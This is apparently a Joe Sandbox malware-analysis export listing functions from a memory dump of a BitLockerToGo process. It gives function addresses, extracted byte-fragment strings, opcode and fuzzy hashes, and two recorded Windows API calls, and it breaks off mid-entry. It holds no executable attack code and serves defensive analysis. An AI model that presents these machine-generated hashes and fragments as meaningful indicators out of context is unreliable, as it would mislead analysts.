Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: U!K$%}|s$789:$789:$789:$789:
API String ID: 0-1970190968
Opcode ID: ca0112e04bc317c4b7ecd815a9fb01000466d11fa73b12e7550a7eb4e7656acb
Instruction ID: a4cc3052b6b54d8ad9855a3f563529829a85d7eef502a7cdbffe3d8edccc5c02
Opcode Fuzzy Hash: ca0112e04bc317c4b7ecd815a9fb01000466d11fa73b12e7550a7eb4e7656acb
Instruction Fuzzy Hash: A5029E75A093029BE314CF24C990B1FF7E2FBC5798F258A2DE68997280C774D955CB82

Function 02FC258B Relevance: 7.8, Strings: 6, Instructions: 334COMMON

Download Yara Rule

Strings

dHNt, xrefs: 02FC2792
7i6W, xrefs: 02FC2F28
;6JE, xrefs: 02FC32A1
T((\, xrefs: 02FC2938
hFt7, xrefs: 02FC34C7
A1C}, xrefs: 02FC294C

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 7i6W$;6JE$A1C}$T((\$dHNt$hFt7
API String ID: 0-3675971485
Opcode ID: 791a2de1e331ea2339828fda0492cb0c0ded2c346ecdd3dfd5033ce4e02f6a03
Instruction ID: 22835599ab2260e658bf3b7ce0391c589c47e0c99cec4e2b97fa854c7077078b
Opcode Fuzzy Hash: 791a2de1e331ea2339828fda0492cb0c0ded2c346ecdd3dfd5033ce4e02f6a03
Instruction Fuzzy Hash: 55C1CB30908F42CBE325CF39C558763BBE2EF52285F24495DC9EA87692DB39A406DF50

Function 02FB999E Relevance: 6.8, Strings: 5, Instructions: 510COMMON

Download Yara Rule

Strings

kFkE, xrefs: 02FB9A3E, 02FB9A08
zpt|, xrefs: 02FB9A7F
kFkE, xrefs: 02FB9B98, 02FB9B48
a}cQ, xrefs: 02FB9A8F
i]ol, xrefs: 02FB9AA7

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: a}cQ$i]ol$kFkE$kFkE$zpt|
API String ID: 0-1684249898
Opcode ID: f0b35b6c966f74d68a0ecf2efcd49eaf9fa7d8c43ff6c0a02a32fdf659763d42
Instruction ID: 1c47ac17853090c7a7b3ae8372fa76d8b79974490f0909d001198b70a0c80bbe
Opcode Fuzzy Hash: f0b35b6c966f74d68a0ecf2efcd49eaf9fa7d8c43ff6c0a02a32fdf659763d42
Instruction Fuzzy Hash: 1902BD72A093519FD315CF29C49076AB7E2FFCA745F09892CEA958B381D774E811CB82

Function 02FAB5AF Relevance: 5.4, Strings: 4, Instructions: 439COMMON

Download Yara Rule

Strings

8EFG, xrefs: 02FAB266
M}J{, xrefs: 02FAB85D
hYFg, xrefs: 02FAB82C
a]h[, xrefs: 02FAB825

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 8EFG$M}J{$a]h[$hYFg
API String ID: 0-1582197512
Opcode ID: c16046202b1ea2b82e6be8cb9d2a81cc4f6e5b2f67c74532e48a4f1271987685
Instruction ID: 45848f718f753a26ae01e432ff3621c6ce8d125769893ee02be93e9cca9922a7
Opcode Fuzzy Hash: c16046202b1ea2b82e6be8cb9d2a81cc4f6e5b2f67c74532e48a4f1271987685
Instruction Fuzzy Hash: 0D1244B5601B02EFD3288F25E891B56FBB2FB49344F108A1DD5AA8BB50C770B465CF90

Function 02FB43E7 Relevance: 5.4, Strings: 4, Instructions: 418COMMON

Download Yara Rule

Strings

=G8@, xrefs: 02FB4602
7452, xrefs: 02FB4568
3>?0, xrefs: 02FB460A
40, xrefs: 02FB4612

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 3>?0$40$7452$=G8@
API String ID: 0-2440578041
Opcode ID: df6773a01dedf2360a3895df3b1ecd1492e339337b9b6e62e7bf615dfe36f9d3
Instruction ID: 1a9733db7c1a83287a49ad1d0785b79ccf542d1302b34f63ce482775fa1bc8fa
Opcode Fuzzy Hash: df6773a01dedf2360a3895df3b1ecd1492e339337b9b6e62e7bf615dfe36f9d3
Instruction Fuzzy Hash: 16E1CEB5A083819BD715CF25D990A6FFBE2BFC9344F148A2DE98987342D774D801CB86

Function 02FB58E0 Relevance: 5.4, Strings: 4, Instructions: 416COMMON

Download Yara Rule

Strings

)S', xrefs: 02FB590A
BA, xrefs: 02FB595E
R5@3, xrefs: 02FB5998
vU9S, xrefs: 02FB5932

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: )S'$BA$R5@3$vU9S
API String ID: 0-1137527077
Opcode ID: 8c6ad287db128a00e2d974ffb55232dd55cfde7b7b8d5743ea450e866f95f8cb
Instruction ID: 769a3daeff225d530fe0e321ba40827f8c6f289f6141a09c985bf6d9d578f3fe
Opcode Fuzzy Hash: 8c6ad287db128a00e2d974ffb55232dd55cfde7b7b8d5743ea450e866f95f8cb
Instruction Fuzzy Hash: A1C19AB19083118BC716CF15C8A17ABB7F1FF85394F858A1CE9965B390E3B8D944CB92

Function 02FBA574 Relevance: 5.3, Strings: 4, Instructions: 324COMMON

Download Yara Rule

Strings

M-S+, xrefs: 02FBA91D
N=[;, xrefs: 02FBA939
`V3, xrefs: 02FBA60D
\)g', xrefs: 02FBA924

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: M-S+$N=[;$\)g'$`V3
API String ID: 0-3759942377
Opcode ID: 74906de378cfeb33b6b00e24b9fa6c5d79f06262116c32dd9e46d191e40e2f95
Instruction ID: f1ec5962230756094a43cedab8efe400fad0b69fb6c24d63aae7cb36b2c01371
Opcode Fuzzy Hash: 74906de378cfeb33b6b00e24b9fa6c5d79f06262116c32dd9e46d191e40e2f95
Instruction Fuzzy Hash: 70C189B4600202CFE724CF29C890A12BBF2FF49784B14899DD9968F756D735E882CF84

Function 02FCDD90 Relevance: 5.3, Strings: 4, Instructions: 296COMMON

Download Yara Rule

Strings

789:, xrefs: 02FCDEF8
789:, xrefs: 02FCDE18, 02FCDE5A
789:, xrefs: 02FCE0F8, 02FCE13A, 02FCE1B8, 02FCE1FE
789:, xrefs: 02FCDF2E

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 789:$789:$789:$789:
API String ID: 0-934226562
Opcode ID: 6928816ce46edbeaea5ca8b346c58dba518c3578aa584c0038f4a70ea68ee0d5
Instruction ID: a888b0766c7e0686f854ad3d75d27a66639f0ec08f44502c8bb9b5384b82a730
Opcode Fuzzy Hash: 6928816ce46edbeaea5ca8b346c58dba518c3578aa584c0038f4a70ea68ee0d5
Instruction Fuzzy Hash: B9A149756083429BE304CF25D69071FBBE3FBC4794F658A2DE58987240CB74D916CB82

Function 02FBAC79 Relevance: 5.2, Strings: 4, Instructions: 191COMMON

Download Yara Rule

Strings

#U3S, xrefs: 02FBAD9F
#]Z[, xrefs: 02FBADAD
)I9W, xrefs: 02FBAD98
;Q3_, xrefs: 02FBADA6

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: #U3S$#]Z[$)I9W$;Q3_
API String ID: 0-3620883656
Opcode ID: 438f6996d90c8c011ec51f8e5f0b1521ddc19f14990eaffd2960313b3a315fd6
Instruction ID: 6d4a432105d1f65d095d1b74ed2d66f3dafa28d922ec5cf101eea877fdbc5dda
Opcode Fuzzy Hash: 438f6996d90c8c011ec51f8e5f0b1521ddc19f14990eaffd2960313b3a315fd6
Instruction Fuzzy Hash: 0961CCB56006019FE329CF29D851B22B7F2FF99750F258A1CD5A68B7A1D774E801CBD0

Function 02FD16F0 Relevance: 4.4, Strings: 3, Instructions: 619COMMON

Download Yara Rule

Strings

789:, xrefs: 02FD18A6
789:, xrefs: 02FD1913, 02FD1854
789:, xrefs: 02FD1768

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 789:$789:$789:
API String ID: 0-2013699379
Opcode ID: 475888996d23adbecb6d8ab8077b45e125ef343ce661d43e7643d464f16d45f8
Instruction ID: 99674707a511069f8178376a5ea463dcd4e587be244aa128333e721bb660155f
Opcode Fuzzy Hash: 475888996d23adbecb6d8ab8077b45e125ef343ce661d43e7643d464f16d45f8
Instruction Fuzzy Hash: 0B229E75A083419FD315CF28C490B1BBBE3BF88794F188A2CE6998B391D775E845CB52

Function 02FA1E30 Relevance: 4.3, Strings: 3, Instructions: 599COMMON

Download Yara Rule

Strings

null, xrefs: 02FA1FE8
true, xrefs: 02FA1F32
false, xrefs: 02FA1F4A

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: false$null$true
API String ID: 0-2913297407
Opcode ID: 994d5d86ceeb3882e064edadb480b934d084200282e1b94840145381f6f3d5e4
Instruction ID: cd4e4299de988999a227904037f8307fc2e500b741988f07e08bc00a4b382c50
Opcode Fuzzy Hash: 994d5d86ceeb3882e064edadb480b934d084200282e1b94840145381f6f3d5e4
Instruction Fuzzy Hash: 4F12F3F1F043099BE7105F25DCA8726BAE5BF403C8F094568EE8A8B282E775D554CB52

Function 02FA4D80 Relevance: 4.1, Strings: 3, Instructions: 393COMMON

Download Yara Rule

Strings

), xrefs: 02FA4DFC
), xrefs: 02FA4E06
IEND, xrefs: 02FA51E0

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: 78b17bd9cf7af2608f66fe7daf58acf212b6f834d176aac22d990ea47dd4bc2a
Instruction ID: c03b76e84478bb2b1952048af8c19066ec99f266ee4dbdbfeac6e9eb3449a276
Opcode Fuzzy Hash: 78b17bd9cf7af2608f66fe7daf58acf212b6f834d176aac22d990ea47dd4bc2a
Instruction Fuzzy Hash: ADE1C3B2E08702AFD310CF28D89075ABBE5BB94344F04492DE6959B381D7B5E915CBD2

Function 02FA95E0 Relevance: 4.0, Strings: 3, Instructions: 239COMMON

Download Yara Rule

Strings

0, xrefs: 02FA9753
fYoa, xrefs: 02FA970B
s~gb, xrefs: 02FA96F3

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 0$fYoa$s~gb
API String ID: 0-1153013650
Opcode ID: 9205fccd3c000863c889e7a8e90d00d51627b54988e4eabcd42de9916e065fb1
Instruction ID: 484b09fa302848e83a442d238c55fa19ab03d3ee7d97edf7c4492c7e23292b32
Opcode Fuzzy Hash: 9205fccd3c000863c889e7a8e90d00d51627b54988e4eabcd42de9916e065fb1
Instruction Fuzzy Hash: E4719D7154D3818BD301CF29C45070BFFE1AFD66A4F188A5CE8D41B395C3799946CB96

Function 02FB179D Relevance: 3.9, Strings: 3, Instructions: 178COMMON

Download Yara Rule

Strings

EG, xrefs: 02FB1F77
*M3O, xrefs: 02FB1F67
U4W, xrefs: 02FB1F97

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: *M3O$EG$U4W
API String ID: 0-1127695287
Opcode ID: 225b26fb373d9c767709e52be138dfbe1e243f2584852bfb03b6088ab7b06b05
Instruction ID: 9927e602cb6d95cb5e2122319caf5f50ac44825387fcf1542ada45060010b5f3
Opcode Fuzzy Hash: 225b26fb373d9c767709e52be138dfbe1e243f2584852bfb03b6088ab7b06b05
Instruction Fuzzy Hash: 9A51A4B59083418BC315CF2AC4A06ABBBF2FF85794F10891DE9998B361E775D841CB92

Function 02FC73A0 Relevance: 3.8, Strings: 3, Instructions: 80COMMON

Download Yara Rule

Strings

{, xrefs: 02FC7458
x, xrefs: 02FC7605
}, xrefs: 02FC761B

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: x${$}
API String ID: 0-2804420588
Opcode ID: c560ba399ffccccef49c43f5260813d94c2d75032324362455741a3b9b88d41b
Instruction ID: fa1047030e5783dbe2d2a0d68238343fbcc450a1f424b14b48da7b9eb2129ec7
Opcode Fuzzy Hash: c560ba399ffccccef49c43f5260813d94c2d75032324362455741a3b9b88d41b
Instruction Fuzzy Hash: ED514DB524A3859AD770DF11C25C79BBBE6BB91788F589D8EC2DC8B240C7760108DF82

Function 02FB121A Relevance: 3.5, Strings: 2, Instructions: 995COMMON

Download Yara Rule

Strings

b, xrefs: 02FB14C3
NM, xrefs: 02FB1D66

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: NM$b
API String ID: 0-1889079123
Opcode ID: 2dbc1f33ad465cf25122e3a8515c9348ee1798db47fb38b36d49a9a9c0bb4944
Instruction ID: 525c5efdca9455912d42f09d5f6b9f0103862255369de551a7bebbdc2816f3f5
Opcode Fuzzy Hash: 2dbc1f33ad465cf25122e3a8515c9348ee1798db47fb38b36d49a9a9c0bb4944
Instruction Fuzzy Hash: 7162B071A083418BD324CF25C4A4BABBBF6FFC5384F04892DE98987291E774D845CB96

Function 02FA5770 Relevance: 3.3, Strings: 2, Instructions: 803COMMON

Download Yara Rule

Strings

8, xrefs: 02FA608E
0, xrefs: 02FA6096

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: c2227d6841a64e17104f8c61544fe8dd86182a25980d5277ec0e482a82d3cc7a
Instruction ID: 82e28663975d8b67d8a46db20461c95ab26baa76cc63d31cb32e2728eaee20ca
Opcode Fuzzy Hash: c2227d6841a64e17104f8c61544fe8dd86182a25980d5277ec0e482a82d3cc7a
Instruction Fuzzy Hash: 3C7229B1A083409FD714CF18C894B5BBBE1BF88398F44891DFA999B391D375D948CB92

Function 02FB7B80 Relevance: 3.0, Strings: 2, Instructions: 470COMMON

Download Yara Rule

Strings

'Y;[, xrefs: 02FB7D48
HI, xrefs: 02FB7D0A

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 'Y;[$HI
API String ID: 0-2129547874
Opcode ID: e0c2f5c29f61a686df4cee82b67e152fdb78b116cac2d16a6eb4f82ad3c6bacd
Instruction ID: ab8b27d7346683dfbcb823a6e7e83654cc28d90405d035ca9b0120764616ddd1
Opcode Fuzzy Hash: e0c2f5c29f61a686df4cee82b67e152fdb78b116cac2d16a6eb4f82ad3c6bacd
Instruction Fuzzy Hash: 4DD10376A043018BD715DF19C8907ABF7F2EFD53A4F188A1CE9868B390E774A940CB91

Function 02FAFBA2 Relevance: 3.0, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

d, xrefs: 02FAFBAC
j, xrefs: 02FAFF14

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: d$j
API String ID: 0-3960525582
Opcode ID: 8b76a108a5ca379f311ce6d7bf248345cc51cc276209c4cc6433abb906ea32e6
Instruction ID: 34e85d6da5f02072e1c36608c59d55ce809454668248120d845a85227bcc6d66
Opcode Fuzzy Hash: 8b76a108a5ca379f311ce6d7bf248345cc51cc276209c4cc6433abb906ea32e6
Instruction Fuzzy Hash: 45E17AB1A0C3808FD361DF28C890B9FBBE6EF85344F44992DE5CA87251D7399845CB56

Function 02FBC3E8 Relevance: 2.8, Strings: 2, Instructions: 344COMMON

Download Yara Rule

Strings

(U(W, xrefs: 02FBC54A
VQ, xrefs: 02FBC552

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: (U(W$VQ
API String ID: 0-1440683923
Opcode ID: 1e625caa85971c5efee494ed91fc1b9e67941b10236571c18f7d936b6dc19d16
Instruction ID: 3ac7fd45f108d0716007c99a6d5b9b4636e20e48409091de158888c0ed2e6587
Opcode Fuzzy Hash: 1e625caa85971c5efee494ed91fc1b9e67941b10236571c18f7d936b6dc19d16
Instruction Fuzzy Hash: 53C17975A08302CFC315CF29C0906ABB7E2FF88794F59896EE1C997360E734A955CB52

Function 02FB0185 Relevance: 2.8, Strings: 2, Instructions: 334COMMON

Download Yara Rule

Strings

4, xrefs: 02FB0414
H-, xrefs: 02FB0384

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 4$H-
API String ID: 0-473352110
Opcode ID: c5e946b4db2b53c6abb1e718841216cc1c43a0ba914e6989d5cf3b6f23bd450a
Instruction ID: 9b82eda17643999827f34cb7f2b6a4faac75ee6fc38755451e7910fb73deba3d
Opcode Fuzzy Hash: c5e946b4db2b53c6abb1e718841216cc1c43a0ba914e6989d5cf3b6f23bd450a
Instruction Fuzzy Hash: 05C18770A093808FD365DF28C880BAEBBE6EF85344F449D1CE5CA97351DB399845CB56

Function 02FB20BA Relevance: 2.7, Strings: 2, Instructions: 192COMMON

Download Yara Rule

Strings

7452, xrefs: 02FB21D8
D, xrefs: 02FB2143

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 7452$D
API String ID: 0-2623526322
Opcode ID: e7b6b3a449dfcff22bd85bcfc1543bbd6e8ea80a1139f7ec98c4bad9dea053aa
Instruction ID: 1faf9f35bf79f30f17ed261ee8684cec32012b88b22034a50d1bc74ebb748c64
Opcode Fuzzy Hash: e7b6b3a449dfcff22bd85bcfc1543bbd6e8ea80a1139f7ec98c4bad9dea053aa
Instruction Fuzzy Hash: 4B718875909341DBE328CF10C5A4B6FBBE2FF88794F558A1CE98697690C3759844CF82

Function 02FB9EEE Relevance: 1.9, APIs: 1, Instructions: 425libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(A0A1AEAF,00000000,00000000), ref: 02FBA12D

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 938cc919d184fe60596524ed94903b8c72a6e6a7709a3e14b6b988786234cc08
Instruction ID: 61bfbb01739972a9f2cc85fcf3ed45ad5b8cc1a85df3a9e76b48330daac151bc
Opcode Fuzzy Hash: 938cc919d184fe60596524ed94903b8c72a6e6a7709a3e14b6b988786234cc08
Instruction Fuzzy Hash: 03D1AF72A09302DFE709CF24D890B6AB7E2FF89389F09896CE585D7281D731E954CB51

Function 02FAE93D Relevance: 1.9, Strings: 1, Instructions: 611COMMON

Download Yara Rule

Strings

Z, xrefs: 02FAF118

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: Z
API String ID: 0-1505515367
Opcode ID: 43bc9932e3bd2a990f3a92e1e0f1b538d5fb14aead2391f520bfd301b0f39f2c
Instruction ID: 9f676ae249eedf9164a101e111574636ebb2c62d66a8a8d0aae250a89e659fe4
Opcode Fuzzy Hash: 43bc9932e3bd2a990f3a92e1e0f1b538d5fb14aead2391f520bfd301b0f39f2c
Instruction Fuzzy Hash: 230203B1A08341DFD305DF28C8A076AB7E6EF89394F095A2CE586C7391E775D805CB92

Function 02FBE1E7 Relevance: 1.8, Strings: 1, Instructions: 557COMMON

Download Yara Rule

Strings

YG, xrefs: 02FBE8E9

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: YG
API String ID: 0-2205521529
Opcode ID: 3a8f1d065ab1e49197809eaece55f3b855db48f5d806ec5a8ba18054e4683608
Instruction ID: 0e60fbd2a4e89cb31c02ebb0c4a4d8dbf12b826d0553562ed42a857558536d5e
Opcode Fuzzy Hash: 3a8f1d065ab1e49197809eaece55f3b855db48f5d806ec5a8ba18054e4683608
Instruction Fuzzy Hash: 8302D1B1A083409FD315CF29C8516ABBBE2AF85384F484E6DE9D687351D734D916CF82

Function 02FD3D40 Relevance: 1.8, Strings: 1, Instructions: 524COMMON

Download Yara Rule

Strings

f543, xrefs: 02FD3D86

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: f543
API String ID: 0-424919641
Opcode ID: b9e7898903e293a3d25e349834ddf6ec0c421c21d85a0f15b4b749ad9f44f9c0
Instruction ID: 604c9e445d8510c06e92a561a7c13de0b67fe580597cb5673a28574b8dc108ae
Opcode Fuzzy Hash: b9e7898903e293a3d25e349834ddf6ec0c421c21d85a0f15b4b749ad9f44f9c0
Instruction Fuzzy Hash: AF02AE36A49251CFC708CF28D49062AF7E2FF89354F098E6DE99997341C774E950CB82

Function 02FB9160 Relevance: 1.7, APIs: 1, Instructions: 249comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(02FD7740,00000000,00000001,02FD7730), ref: 02FB9189

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 54e45f62b15c8011d8b8b8eb80bb4f606cd403b5473d41d5c8de3f8ea230df49
Instruction ID: a72d7d2f511b288f549a74ca9e80d0eb8848a0049ccf6f4a90101527b998db93
Opcode Fuzzy Hash: 54e45f62b15c8011d8b8b8eb80bb4f606cd403b5473d41d5c8de3f8ea230df49
Instruction Fuzzy Hash: FD51D2B1F042049BEB219B65CC86BA373B9FF55398F184558EB468B3D0E7B5E800CB51

Function 02FD3E40 Relevance: 1.7, Strings: 1, Instructions: 490COMMON

Download Yara Rule

Strings

-#Z[, xrefs: 02FD3E86

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: -#Z[
API String ID: 0-4126830052
Opcode ID: c4d5b6ef7a0bc22e20413de147bb06746bef5bad93b06e8bc9957b8a0cf656a0
Instruction ID: 7debc1f39194b44df8fd537f31b56e1d2f0ed0ba8c9d0dca5607104702a8acda
Opcode Fuzzy Hash: c4d5b6ef7a0bc22e20413de147bb06746bef5bad93b06e8bc9957b8a0cf656a0
Instruction Fuzzy Hash: B6F1C036A09251CFD708CF28D4A062AF7E2FF89354F098E6DE99997381C771D950CB82

Function 02FC1720 Relevance: 1.7, Strings: 1, Instructions: 408COMMON

Download Yara Rule

Strings

", xrefs: 02FC1A08

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 69e2b77e7b3e1df5b3673d9db91d8eb2e69957b8188a840ee9e50b5f2e452c59
Instruction ID: 1db89d6bcd6beeb75dcff5bec12a6992c59216b8db42ff0f60466b55b5a9ac01
Opcode Fuzzy Hash: 69e2b77e7b3e1df5b3673d9db91d8eb2e69957b8188a840ee9e50b5f2e452c59
Instruction Fuzzy Hash: 15D127B2A083165FC714CE24C95076BB7EAAF85394F28852DEA9D87382E734D914CBD1

Function 02FA6A10 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 02FA6B46

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 30262e9433a6b4999526016ea34f822655c4c1180ff78b12f3afa12e8681e29e
Instruction ID: b8f9e566edfb4906967966d00b3077e91491d981489cf25eea9e2bc7d36de122
Opcode Fuzzy Hash: 30262e9433a6b4999526016ea34f822655c4c1180ff78b12f3afa12e8681e29e
Instruction Fuzzy Hash: 4AB16C716093819FC725CF18C89061BFBE4AFA9744F488E2DE5D697342D631E908CB67

Function 02FB2BBF Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

7452, xrefs: 02FB2C18

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 7452
API String ID: 0-87867774
Opcode ID: afb9bf7af0c52e12cec270210b3c917e5f4d906ee0016125684edbc27e5ce19c
Instruction ID: 217728ab2e837cb0379880c3836f33d875b1e904a8e5115fea45c99cd40c857a
